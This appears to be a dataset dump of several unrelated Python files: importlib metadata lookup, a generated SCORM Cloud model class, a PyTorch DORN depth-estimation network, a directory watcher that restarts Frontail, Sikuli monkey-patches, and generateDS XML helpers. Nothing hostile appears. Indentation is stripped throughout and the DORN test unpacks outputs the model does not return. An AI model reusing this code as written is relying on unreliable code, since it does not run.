for line in filter(None, lines):
section_match = re.match(r'\[(.*)\]$', line)
if section_match:
section = section_match.group(1)
continue
yield locals()
@staticmethod
def _convert_egg_info_reqs_to_simple_reqs(sections):
"""
Historically, setuptools would solicit and store 'extra'
requirements, including those with environment markers,
in separate sections. More modern tools expect each
dependency to be defined separately, with any relevant
extras and environment markers attached directly to that
requirement. This method converts the former to the
latter. See _test_deps_from_requires_text for an example.
"""
def make_condition(name):
return name and 'extra == "{name}"'.format(name=name)
def parse_condition(section):
section = section or ''
extra, sep, markers = section.partition(':')
if extra and markers:
markers = '({markers})'.format(markers=markers)
conditions = list(filter(None, [markers, make_condition(extra)]))
return '; ' + ' and '.join(conditions) if conditions else ''
for section, deps in sections.items():
for dep in deps:
yield dep + parse_condition(section)
class DistributionFinder(MetaPathFinder):
"""
A MetaPathFinder capable of discovering installed distributions.
"""
class Context:
name = None
"""
Specific name for which a distribution finder should match.
"""
def __init__(self, **kwargs):
vars(self).update(kwargs)
@property
def path(self):
"""
The path that a distribution finder should search.
"""
return vars(self).get('path', sys.path)
@property
def pattern(self):
return '.*' if self.name is None else re.escape(self.name)
@abc.abstractmethod
def find_distributions(self, context=Context()):
"""
Find distributions.
Return an iterable of all Distribution instances capable of
loading the metadata for packages matching the ``context``,
a DistributionFinder.Context instance.
"""
@install
class MetadataPathFinder(NullFinder, DistributionFinder):
"""A degenerate finder for distribution packages on the file system.
This finder supplies only a find_distributions() method for versions
of Python that do not have a PathFinder find_distributions().
"""
def find_distributions(self, context=DistributionFinder.Context()):
"""
Find distributions.
Return an iterable of all Distribution instances capable of
loading the metadata for packages matching ``context.name``
(or all names if ``None`` indicated) along the paths in the list
of directories ``context.path``.
"""
found = self._search_paths(context.pattern, context.path)
return map(PathDistribution, found)
@classmethod
def _search_paths(cls, pattern, paths):
"""Find metadata directories in paths heuristically."""
return itertools.chain.from_iterable(
cls._search_path(path, pattern)
for path in map(cls._switch_path, paths)
)
@staticmethod
def _switch_path(path):
if not PYPY_OPEN_BUG or os.path.isfile(path): # pragma: no branch
with suppress(Exception):
return zipp.Path(path)
return pathlib.Path(path)
@classmethod
def _matches_info(cls, normalized, item):
template = r'{pattern}(-.*)?\.(dist|egg)-info'
manifest = template.format(pattern=normalized)
return re.match(manifest, item.name, flags=re.IGNORECASE)
@classmethod
def _matches_legacy(cls, normalized, item):
template = r'{pattern}-.*\.egg[\\/]EGG-INFO'
manifest = template.format(pattern=normalized)
return re.search(manifest, str(item), flags=re.IGNORECASE)
@classmethod
def _search_path(cls, root, pattern):
if not root.is_dir():
return ()
normalized = pattern.replace('-', '_')
return (item for item in root.iterdir()
if cls._matches_info(normalized, item)
or cls._matches_legacy(normalized, item))
class PathDistribution(Distribution):
def __init__(self, path):
"""Construct a distribution from a path to the metadata directory.
:param path: A pathlib.Path or similar object supporting
.joinpath(), __div__, .parent, and .read_text().
"""
self._path = path
def read_text(self, filename):
with suppress(FileNotFoundError, IsADirectoryError, KeyError,
NotADirectoryError, PermissionError):
return self._path.joinpath(filename).read_text(encoding='utf-8')
read_text.__doc__ = Distribution.read_text.__doc__
def locate_file(self, path):
return self._path.parent / path
def distribution(distribution_name):
"""Get the ``Distribution`` instance for the named package.
:param distribution_name: The name of the distribution package as a string.
:return: A ``Distribution`` instance (or subclass thereof).
"""
return Distribution.from_name(distribution_name)
def distributions(**kwargs):
"""Get all ``Distribution`` instances in the current environment.
:return: An iterable of ``Distribution`` instances.
"""
return Distribution.discover(**kwargs)
def metadata(distribution_name):
"""Get the metadata for the named package.
:param distribution_name: The name of the distribution package to query.
:return: An email.Message containing the parsed metadata.
"""
return Distribution.from_name(distribution_name).metadata
def version(distribution_name):
"""Get the version string for the named package.
:param distribution_name: The name of the distribution package to query.
:return: The version string for the package as defined in the package's
"Version" metadata key.
"""
return distribution(distribution_name).version
def entry_points():
"""Return EntryPoint objects for all installed packages.
:return: EntryPoint objects for all installed packages.
"""
eps = itertools.chain.from_iterable(
dist.entry_points for dist in distributions())
by_group = operator.attrgetter('group')
ordered = sorted(eps, key=by_group)
grouped = itertools.groupby(ordered, by_group)
return {
group: tuple(eps)
for group, eps in grouped
}
def files(distribution_name):
"""Return a list of files for the named package.
:param distribution_name: The name of the distribution package to query.
:return: List of files composing the distribution.
"""
return distribution(distribution_name).files
def requires(distribution_name):
"""
Return a list of requirements for the named package.
:return: An iterator of requirements, suitable for
packaging.requirement.Requirement.
"""
return distribution(distribution_name).requires
try:
__version__ = version(__name__)
except:
__version__ = '0.22'
|
py | 1a37e3932b1651927ac4e5a0ccf30b068f2b9466 | # coding: utf-8
"""
SCORM Cloud Rest API
REST API used for SCORM Cloud integrations. # noqa: E501
OpenAPI spec version: 2.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class LearnerPreferenceSchema(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'audio_level': 'float',
'language': 'str',
'delivery_speed': 'float',
'audio_captioning': 'int'
}
attribute_map = {
'audio_level': 'audioLevel',
'language': 'language',
'delivery_speed': 'deliverySpeed',
'audio_captioning': 'audioCaptioning'
}
def __init__(self, audio_level=None, language=None, delivery_speed=None, audio_captioning=None): # noqa: E501
"""LearnerPreferenceSchema - a model defined in Swagger""" # noqa: E501
self._audio_level = None
self._language = None
self._delivery_speed = None
self._audio_captioning = None
self.discriminator = None
if audio_level is not None:
self.audio_level = audio_level
if language is not None:
self.language = language
if delivery_speed is not None:
self.delivery_speed = delivery_speed
if audio_captioning is not None:
self.audio_captioning = audio_captioning
@property
def audio_level(self):
"""Gets the audio_level of this LearnerPreferenceSchema. # noqa: E501
:return: The audio_level of this LearnerPreferenceSchema. # noqa: E501
:rtype: float
"""
return self._audio_level
@audio_level.setter
def audio_level(self, audio_level):
"""Sets the audio_level of this LearnerPreferenceSchema.
:param audio_level: The audio_level of this LearnerPreferenceSchema. # noqa: E501
:type: float
"""
self._audio_level = audio_level
@property
def language(self):
"""Gets the language of this LearnerPreferenceSchema. # noqa: E501
:return: The language of this LearnerPreferenceSchema. # noqa: E501
:rtype: str
"""
return self._language
@language.setter
def language(self, language):
"""Sets the language of this LearnerPreferenceSchema.
:param language: The language of this LearnerPreferenceSchema. # noqa: E501
:type: str
"""
self._language = language
@property
def delivery_speed(self):
"""Gets the delivery_speed of this LearnerPreferenceSchema. # noqa: E501
:return: The delivery_speed of this LearnerPreferenceSchema. # noqa: E501
:rtype: float
"""
return self._delivery_speed
@delivery_speed.setter
def delivery_speed(self, delivery_speed):
"""Sets the delivery_speed of this LearnerPreferenceSchema.
:param delivery_speed: The delivery_speed of this LearnerPreferenceSchema. # noqa: E501
:type: float
"""
self._delivery_speed = delivery_speed
@property
def audio_captioning(self):
"""Gets the audio_captioning of this LearnerPreferenceSchema. # noqa: E501
:return: The audio_captioning of this LearnerPreferenceSchema. # noqa: E501
:rtype: int
"""
return self._audio_captioning
@audio_captioning.setter
def audio_captioning(self, audio_captioning):
"""Sets the audio_captioning of this LearnerPreferenceSchema.
:param audio_captioning: The audio_captioning of this LearnerPreferenceSchema. # noqa: E501
:type: int
"""
self._audio_captioning = audio_captioning
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(LearnerPreferenceSchema, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LearnerPreferenceSchema):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
py | 1a37e502b0ea4f346396ae07b2671b86d3bb8551 | import os
import torch
import torch.nn as nn
import torchvision.models
import collections
import math
def weights_init(modules, type='xavier'):
m = modules
if isinstance(m, nn.Conv2d):
if type == 'xavier':
torch.nn.init.xavier_normal_(m.weight)
elif type == 'kaiming': # msra
torch.nn.init.kaiming_normal_(m.weight)
else:
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.ConvTranspose2d):
if type == 'xavier':
torch.nn.init.xavier_normal_(m.weight)
elif type == 'kaiming': # msra
torch.nn.init.kaiming_normal_(m.weight)
else:
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1.0)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
if type == 'xavier':
torch.nn.init.xavier_normal_(m.weight)
elif type == 'kaiming': # msra
torch.nn.init.kaiming_normal_(m.weight)
else:
m.weight.data.fill_(1.0)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.Module):
for m in modules:
if isinstance(m, nn.Conv2d):
if type == 'xavier':
torch.nn.init.xavier_normal_(m.weight)
elif type == 'kaiming': # msra
torch.nn.init.kaiming_normal_(m.weight)
else:
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.ConvTranspose2d):
if type == 'xavier':
torch.nn.init.xavier_normal_(m.weight)
elif type == 'kaiming': # msra
torch.nn.init.kaiming_normal_(m.weight)
else:
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1.0)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
if type == 'xavier':
torch.nn.init.xavier_normal_(m.weight)
elif type == 'kaiming': # msra
torch.nn.init.kaiming_normal_(m.weight)
else:
m.weight.data.fill_(1.0)
if m.bias is not None:
m.bias.data.zero_()
class FullImageEncoder(nn.Module):
def __init__(self, dataset='kitti'):
super(FullImageEncoder, self).__init__()
self.global_pooling = nn.AvgPool2d(8, stride=8, padding=(1, 0)) # KITTI 16 16
self.dropout = nn.Dropout2d(p=0.5)
self.global_fc = nn.Linear(2048 * 4 * 5, 512)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(512, 512, 1) # 1x1 卷积
self.upsample = nn.UpsamplingBilinear2d(size=(30, 40)) # KITTI 49X65 NYU 33X45
self.dataset = dataset
weights_init(self.modules(), 'xavier')
def forward(self, x):
x1 = self.global_pooling(x)
# print('# x1 size:', x1.size())
x2 = self.dropout(x1)
x3 = x2.view(-1, 2048 * 4 * 5)
x4 = self.relu(self.global_fc(x3))
# print('# x4 size:', x4.size())
x4 = x4.view(-1, 512, 1, 1)
# print('# x4 size:', x4.size())
x5 = self.conv1(x4)
out = self.upsample(x5)
return out
class SceneUnderstandingModule(nn.Module):
def __init__(self, output_channel=136, dataset='kitti'):
super(SceneUnderstandingModule, self).__init__()
self.encoder = FullImageEncoder(dataset=dataset)
self.aspp1 = nn.Sequential(
nn.Conv2d(2048, 512, 1),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 1),
nn.ReLU(inplace=True)
)
self.aspp2 = nn.Sequential(
nn.Conv2d(2048, 512, 3, padding=6, dilation=6),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 1),
nn.ReLU(inplace=True)
)
self.aspp3 = nn.Sequential(
nn.Conv2d(2048, 512, 3, padding=12, dilation=12),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 1),
nn.ReLU(inplace=True)
)
self.aspp4 = nn.Sequential(
nn.Conv2d(2048, 512, 3, padding=18, dilation=18),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 1),
nn.ReLU(inplace=True)
)
self.concat_process = nn.Sequential(
nn.Dropout2d(p=0.5),
nn.Conv2d(512 * 5, 2048, 1),
nn.ReLU(inplace=True),
nn.Dropout2d(p=0.5),
nn.Conv2d(2048, output_channel, 1), # KITTI 142 NYU 136 In paper, K = 80 is best, so use 160 is good!
# nn.UpsamplingBilinear2d(scale_factor=8)
nn.UpsamplingBilinear2d(size=(240, 320))
)
weights_init(self.modules(), type='xavier')
def forward(self, x):
x1 = self.encoder(x)
x2 = self.aspp1(x)
x3 = self.aspp2(x)
x4 = self.aspp3(x)
x5 = self.aspp4(x)
x6 = torch.cat((x1, x2, x3, x4, x5), dim=1)
# print('cat x6 size:', x6.size())
out = self.concat_process(x6)
return out
class OrdinalRegressionLayer(nn.Module):
def __init__(self):
super(OrdinalRegressionLayer, self).__init__()
#self.logsoftmax = nn.Logsoftmax(dim=1)
def forward(self, x):
N, C, H, W = x.size()
ord_num = C // 2
A = x[:, ::2, :, :].clone()
B = x[:, 1::2, :, :].clone()
A = A.view(N, 1, ord_num * H * W)
B = B.view(N, 1, ord_num * H * W)
C = torch.cat((A, B), dim=1)
#C = torch.clamp(C, min=1e-7, max=1e7) # prevent nans
ord_c = nn.functional.softmax(C, dim=1)
ord_c1 = ord_c[:, 1, :].clone()
ord_c2 = nn.LogSoftmax(dim=1)(C)
ord_c1 = ord_c1.view(-1, ord_num, H, W)
ord_c2 = ord_c2.view(-1, ord_num * 2, H, W)
decode_c = torch.sum((ord_c1 >= 0.5), dim=1).view(-1, 1, H, W).float()
return decode_c, ord_c2
class ResNet(nn.Module):
def __init__(self, in_channels=3, pretrained=True, freeze=True):
super(ResNet, self).__init__()
pretrained_model = torchvision.models.__dict__['resnet{}'.format(101)](pretrained=pretrained)
self.channel = in_channels
self.conv1 = nn.Sequential(collections.OrderedDict([
('conv1_1', nn.Conv2d(self.channel, 64, kernel_size=3, stride=2, padding=1, bias=False)),
('bn1_1', nn.BatchNorm2d(64)),
('relu1_1', nn.ReLU(inplace=True)),
('conv1_2', nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=False)),
('bn_2', nn.BatchNorm2d(64)),
('relu1_2', nn.ReLU(inplace=True)),
('conv1_3', nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1, bias=False)),
('bn1_3', nn.BatchNorm2d(128)),
('relu1_3', nn.ReLU(inplace=True))
]))
self.bn1 = nn.BatchNorm2d(128)
# print(pretrained_model._modules['layer1'][0].conv1)
self.relu = pretrained_model._modules['relu']
self.maxpool = pretrained_model._modules['maxpool']
self.layer1 = pretrained_model._modules['layer1']
self.layer1[0].conv1 = nn.Conv2d(128, 64, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layer1[0].downsample[0] = nn.Conv2d(128, 256, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layer2 = pretrained_model._modules['layer2']
self.layer3 = pretrained_model._modules['layer3']
self.layer3[0].conv2 = nn.Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
self.layer3[0].downsample[0] = nn.Conv2d(512, 1024, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layer4 = pretrained_model._modules['layer4']
self.layer4[0].conv2 = nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
self.layer4[0].downsample[0] = nn.Conv2d(1024, 2048, kernel_size=(1, 1), stride=(1, 1), bias=False)
# clear memory
del pretrained_model
if pretrained:
weights_init(self.conv1, type='kaiming')
weights_init(self.layer1[0].conv1, type='kaiming')
weights_init(self.layer1[0].downsample[0], type='kaiming')
weights_init(self.layer3[0].conv2, type='kaiming')
weights_init(self.layer3[0].downsample[0], type='kaiming')
weights_init(self.layer4[0].conv2, 'kaiming')
weights_init(self.layer4[0].downsample[0], 'kaiming')
else:
weights_init(self.modules(), type='kaiming')
if freeze:
self.freeze()
def forward(self, x):
# print(pretrained_model._modules)
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
# print('conv1:', x.size())
x = self.maxpool(x)
# print('pool:', x.size())
x1 = self.layer1(x)
# print('layer1 size:', x1.size())
x2 = self.layer2(x1)
# print('layer2 size:', x2.size())
x3 = self.layer3(x2)
# print('layer3 size:', x3.size())
x4 = self.layer4(x3)
# print('layer4 size:', x4.size())
return x4
def freeze(self):
for m in self.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
class DORN(nn.Module):
def __init__(self, output_size=(240, 320), losstype=1, channel=3, pretrained=True, freeze=True, output_channel=3, dataset='kitti'):
super(DORN, self).__init__()
self.output_size = output_size
self.channel = channel
self.feature_extractor = ResNet(in_channels=channel, pretrained=pretrained, freeze=freeze)
self.aspp_module = SceneUnderstandingModule(output_channel=output_channel, dataset=dataset)
self.orl = OrdinalRegressionLayer()
self.losstype = losstype
def forward(self, x):
x1 = self.feature_extractor(x)
x2 = self.aspp_module(x1)
return x2
def get_1x_lr_params(self):
b = [self.feature_extractor]
for i in range(len(b)):
for k in b[i].parameters():
if k.requires_grad:
yield k
def get_10x_lr_params(self):
b = [self.aspp_module, self.orl]
for j in range(len(b)):
for k in b[j].parameters():
if k.requires_grad:
yield k
# os.environ["CUDA_VISIBLE_DEVICES"] = "1" # 默认使用GPU 0
if __name__ == "__main__":
model = DORN()
model = model.cuda()
model.eval()
image = torch.randn(1, 3, 257, 353)
image = image.cuda()
with torch.no_grad():
out0, out1 = model(image)
print('out0 size:', out0.size())
print('out1 size:', out1.size())
print(out0)
|
py | 1a37e648bfc352f2d5dab53e377ec99c39aa6956 | #!/usr/bin/env python
from os import listdir
from os.path import isfile, join
import pickle
import os
from loguru import logger
def diff(l1, l2):
return list(set(l2) - set(l1))
logger.info("Running")
WORK_DIR = os.environ['WORK_DIR']
cur_files = [f for f in listdir(WORK_DIR) if isfile(join(WORK_DIR, f))]
try:
last_files_pickle = open('/tmp/workdir_files.pickle','rb')
last_files = pickle.load(last_files_pickle)
last_files_pickle.close()
logger.info("Compare Work Dir")
if len(diff(cur_files, last_files)) > 0 or len(diff(last_files, cur_files)) > 0:
logger.warning("Changes found, restarting Frontail")
os.system("pkill -f frontail")
os.system("/root/run_trail.sh")
except:
pass
# Write status
logger.info("Writing current dir status")
cur_files_pickle = open('/tmp/workdir_files.pickle','wb')
pickle.dump(cur_files, cur_files_pickle)
cur_files_pickle.close()
|
py | 1a37e65ad250591b851006e39a2b50486df0b9cb | """
Copyright (c) 2013, SMART Technologies ULC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Copyright holder (SMART Technologies ULC) nor
the names of its contributors (Joshua Henn) may be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER (SMART Technologies
ULC) "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from org.sikuli.script import Location, Pattern
import types
from sikuli import Env, Region
from org.sikuli.script import Region as JRegion
from org.sikuli.script import Env as JEnv
#from config import Config
#from logger import Logger
from sikuli.Sikuli import capture
# =============================================== #
# Overwritten sikuli methods #
# =============================================== #
# function for calling native sikuli methods
def sikuli_method(name, *args, **kwargs):
return sys.modules['sikuli.Sikuli'].__dict__[name](*args, **kwargs)
# overwritten Screen.exists method
def exists(target, timeout=None):
addFoundImage(getFilename(target))
return sikuli_method('exists', target, timeout)
# =============================================== #
# Overwritten sikuli classes #
# =============================================== #
@staticmethod
def EnvGetOSVersion(fullName=None):
if not fullName:
return Env.oldGetOSVersion();
elif Env.oldGetOSVersion() == '5.1':
return 'XP'
elif Env.oldGetOSVersion() == '6.0':
return 'Vista'
elif Env.oldGetOSVersion() == '6.1':
return 'Win7'
Env.oldGetOSVersion = Env.getOSVersion
Env.getOSVersion = EnvGetOSVersion
## Java Region patching
def add(self, operand):
# If we're trying to add None, just return the original region
if not operand:
return self
regions = [self, operand]
# more than one region, get min/max region
minX, minY = 9999, 9999
maxX, maxY = -9999, -9999
for region in regions:
if region.getX() < minX: minX = int(region.getX())
if region.getY() < minY: minY = int(region.getY())
# If this is a region type
if hasattr(region, "getW") and hasattr(region, "getH"):
if (region.getX() + region.getW()) > maxX: maxX = region.getX() + region.getW()
if (region.getY() + region.getH()) > maxY: maxY = region.getY() + region.getH()
else:
if region.getX() > maxX: maxX = int(region.getX())
if region.getY() > maxY: maxY = int(region.getY())
return Region(minX, minY, maxX-minX, maxY-minY)
JRegion.add = add
# Java Region patching
def limit(self, operand):
# If we're trying to limit None, return original
if not operand:
return self
x1 = self.getX() if self.getX() > operand.getX() else operand.getX()
y1 = self.getY() if self.getY() > operand.getY() else operand.getY()
x2 = (self.getX() + self.getW()) if (self.getX() + self.getW()) < (operand.getX() + operand.getW()) else (operand.getX() + operand.getW())
y2 = (self.getY() + self.getH()) if (self.getY() + self.getH()) < (operand.getY() + operand.getH()) else (operand.getY() + operand.getH())
# Check region is valid positive
if x2-x1 < 0 or y2-y1 < 0:
raise Exception("Region %s is outside the bounds of the ParentRegion %s" % (self, operand))
return Region(x1, y1, x2-x1, y2-y1)
JRegion.limit = limit
def offset(self, operand):
self.setX(self.getX() + operand.getX())
self.setY(self.getY() + operand.getY())
return self
##
def regionInit(self, operand, *args, **kargs):
# Handle a list of regions
if isinstance(operand, list):
region = None
for item in operand:
if region:
region = region.add(item)
else:
region = item
self.oldInit(region, *args, **kargs)
else:
self.oldInit(operand, *args, **kargs)
JRegion.oldInit = JRegion.__init__
JRegion.__init__ = regionInit
## Region patching
#JRegion.timeout = Config.regionTimeout
JRegion.clickOffset = Location(0,0)
# Define setClickOffset
def setClickOffset(self, offset):
assert isinstance(offset, Location)
self.clickOffset = offset
JRegion.setClickOffset = setClickOffset
# Define getClickLocation
def getClickLocation(self):
x = self.x + (self.w/2) + self.clickOffset.getX()
y = self.y + (self.h/2) + self.clickOffset.getY()
return Location(x, y)
JRegion.getClickLocation = getClickLocation
# Define getClickLocation
def getClickOffset(self):
return self.clickOffset
JRegion.getClickOffset = getClickOffset
|
py | 1a37e6dd5a2dbec7323e9edddc83618248df08f3 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Wed Nov 27 15:47:42 2019 by generateDS.py version 2.29.2.
# Python 3.7.4 (default, Oct 4 2019, 06:57:26) [GCC 9.2.0]
#
# Command line options:
# ('--no-namespace-defs', '')
# ('--use-getter-setter', 'none')
# ('-f', '')
# ('-o', '/home/mileo/Projects/oca10/src/nfselib/nfselib/dsf/ReqConsultaNFSeRPS.py')
#
# Command line arguments:
# -
#
# Command line:
# /home/mileo/Projects/rvaly/generateds/generateDS.py --no-namespace-defs --use-getter-setter="none" -f -o "/home/mileo/Projects/oca10/src/nfselib/nfselib/dsf/ReqConsultaNFSeRPS.py" -
#
# Current working directory (os.getcwd()):
# dsf
#
from __future__ import unicode_literals
import sys
import re as re_
import base64
import datetime as datetime_
import warnings as warnings_
from builtins import str
try:
from lxml import etree as etree_
except ImportError:
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
doc = etree_.parse(infile, parser=parser, **kwargs)
return doc
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for a example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ImportError:
GenerateDSNamespaceDefs_ = {}
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return values
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_validate_float(self, input_data, node=None, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return values
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node=None, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node=None, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (time_parts[0], micro_seconds, )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
